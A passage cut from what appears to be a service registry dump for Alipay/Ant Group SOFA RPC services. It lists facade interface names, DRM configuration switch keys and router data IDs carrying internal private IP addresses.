y.autoinsprod.common.service.facade.AutoMarketingBoothFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.agds.master.client.api.ModelInfoManager:1.0:bkModelInfoManager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.facade.depository.api.SubAccountOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bpaas.commontools.common.service.facade.EnergyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.antg.facade.digitalid.DigitalArchiveQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insdataprod.common.service.facade.diff.api.QueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.common.service.facade.notice.NoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.task.SystemOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ALIPAYPOINTMC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:cstask_queryAndRelievePunishStrategyProcessmngCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCertGZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.SslCertQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.staticrescore.common.service.facade.ResDistributeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.138.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finasmcore.common.service.facade.activity.service.ActivityPrizeRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.dayuarkbase.facade.DayuArkRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gfinvest.facade.api.investtrade.OptionFairValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxyExterfaceNotifyManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_OVERSEAS_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.config-security-false:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insendorseprod.common.service.InsEndorsementAcceptanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:openinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.25.190.109#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iopencore.common.service.facade.api.AppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.moneybox.facade.FundCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.zone.drm.ZoneConfigDrm.grayZoneGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fporgassetdecision.common.service.facade.api.AssetDisposeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.ipaysales.facade.api.product.IpaysalesProdSaleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.facade.DataQualityCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.standardfundprod.service.FundOrderProdFacade:1.0:fundOrderProdFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.searchportal.biz.shared.demeter.manager.AppProfileManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushUrlRedirectRestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconStatisticsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0:limitSCureMsgListener@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.modelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fraudmng.biz.service.fuse.FuseSingleStrategyStatisticManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheMifFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MERCHANT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.saleItemPackageVoucherLinkBase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchmobile.common.service.facade.mmcard.MrchMemberCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.ClearingPredictConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.GotoneConfigDrmResource.highPrtyGrantSuccessGotoneUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imif.common.service.facade.api.MerchantOperationLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:fundapplication@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_ESCROWPROM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insinformcore.common.service.facade.itg.api.ItgCommonDiseaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.platform.common.service.facade.api.user.UserOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.125.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.distinguishprod.common.service.facade.ConfigParmaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.pcinstdata.common.service.facade.service.orgconfig.PcInstInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.muac.api.facade.qdb.DataExportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebbatch.service.facade.api.YebSwitchFundEmergencyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dont-load-plugin:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:certify@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:setOrderWaitPayHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PAYGROWTH#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cap.common.i18n.facade.CapI18nService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.creditexpress.CreditExpressConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.custcpt.facade.IdGraphQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finstore.common.service.facade.fop.api.FinQuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstmng.facade.api.whitelist.WhitelistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.device.OpenDeviceQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TxpSwitchResource.hideBuyerAndSellerNamePids,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:keymap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.217.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:linkt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zqualitywallecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.PrivilegeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.drop.level.consultInterTradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filefactory.service.facade.FilePlatformParseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.instdatamng.InstDataManageExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.paramcore.common.service.standard.facade.api.czone.ParmClientLoadCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcontent.common.service.facade.api.search.ContentSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.150#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mrchiscore:name=com.alipay.mrchiscore.settling.common.service.integration.drm.ConsumptiSwitchDrm.psFilterOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.findecision.common.service.facade.rule.RuleQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.terminal.facade.TerminalCommenReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.testExcludeEvents,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderApplyCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerBcRedEnvelopeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_HSF_LOW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.bizops.facade.ShadowTestDssFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbocenter.common.service.facade.risk.FireeyeRtNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoadprod.common.service.AdvertisementPublishService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdistinguish.common.service.facade.RedPicTemplateDaoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.72.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iglobalfundcontrol.common.config.api.FundPlanDiagnosticGroovyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.biscenter.uem.common.service.facade.process.UEMProcessQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.69.213.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.80.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csmobile.servie.facade.api.RouterConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fininfo:name=com.alipay.fininfo.biz.info.drm.EscapeCharacterDRM.escapeCharacterExchangeCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.defincustomer.facade.api.member.MemberQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.GlobalSwitcher.elasticRuleForLoadTestNew,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdrmdata.rest.url@DRM#@#DEFAULT_INSTANCE_ID#@#DRM","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:asttshipcoreFluxInstrctionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeco.acl.common.service.facade.IGroupSer:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:antschedulerconsole@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.serverRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.service.loan.drm.DeferOperateUtilDrm.deferCreditOrgNewLoanSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantProfileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.SysParameterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:cougar@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.binding.DeviceInfoManagementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.model.control.AsynCommitOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fastq-easyapps@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.topup.TokenOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsPolicyAccessRemove2388DrmClient.taoBaoPolicyAccessRemove2388Switch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.facade.fund.api.RegisterInstReconLogItemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finslip_pcconfigread_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfsettleprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.UserMedalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.config.UserValidateConfigDrm.maxInvestmentContractCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acparamcore.facade.api.MetaDataFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.integration.biscenter.OperatorShopPermissionClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdGlobalNoticeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcustprod.common.service.facade.api.UserDocFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insuserinsight.facade.opportunity.OpportunityMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.client.drm.CifTouchCacheSwitcher.touchCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:instantRedPointDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundbudget.facade.api.FdbudgetBackendViewAmountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.query.AftransQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-custinsight-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.IguideUmChartService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:msgopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.computeConfidence,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.42.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_BANKPROD_COMMON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acpmscore.facade.ProjectDailyReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.client.facade.appgw.AppGWFacade:1.0:BKMERCHANTPROD_APPGW@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.write.SignContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.TicketQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.confreg.api.ConfregFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.VirtualAdvanceAccountInfoRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:almcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.datav.facade.DataVirtualConfigQuery:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fporgassetkeeper.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insclaiminvestprod.facade.transport.RecommendPortalBackendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.notice.LifeNoticeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.payment.api.PmtExtraHisDAOQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbdesk.common.service.facade.api.KbDeskAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.api.CashierMultiQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcscenter.facade.GenericXpToKbServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openCity_nodeHandle_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custcpt.facade.AccountTreatService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.grade.GradeMoveForAlipaymemberService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaascoreng.facade.ops.AppServerTrafficFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.164.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.appxagg.common.service.facade.api.management.page.PageMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditledger.common.service.facade.api.BusinessAuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:./kkkkkkkkk3104041034_19820209.jpg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cdp.common.service.facade.space.api.CdpSpaceResourceApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sda_appUpgradeTask_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.ecomerchant.facade.merchant.admin.MerchantQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.PushInfoService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.view.facade.ViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub4:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transfercenter.common.service.facade.api.TransferConfigFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.97.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.tmall.QueryEBillFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.activityNotifyWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.biz.service.impl.rpc.EleComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.easytrip.facacde.api.scenic.ScenicDistrictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.rulecenter.core.engine.RuleRouteResource.ruleRouteConfig,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:insautobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstprod.common.service.facade.api.commonconfig.CommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.article.SecuinfosFeedFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.mng.PushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_CT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.config.MobileCodecConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.SopMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecuPlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderRateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.outsource.GrsOutsourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.datatool.DataQueryService:1.0:checkroute@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.profit.UserProfitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.metadata.ModelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mindv.survey.delivery.SurveyDeliveryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.api.ScenePrivacyQuestionManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.PermissionFacade:1.0@DEFAULT#@#DEFAUL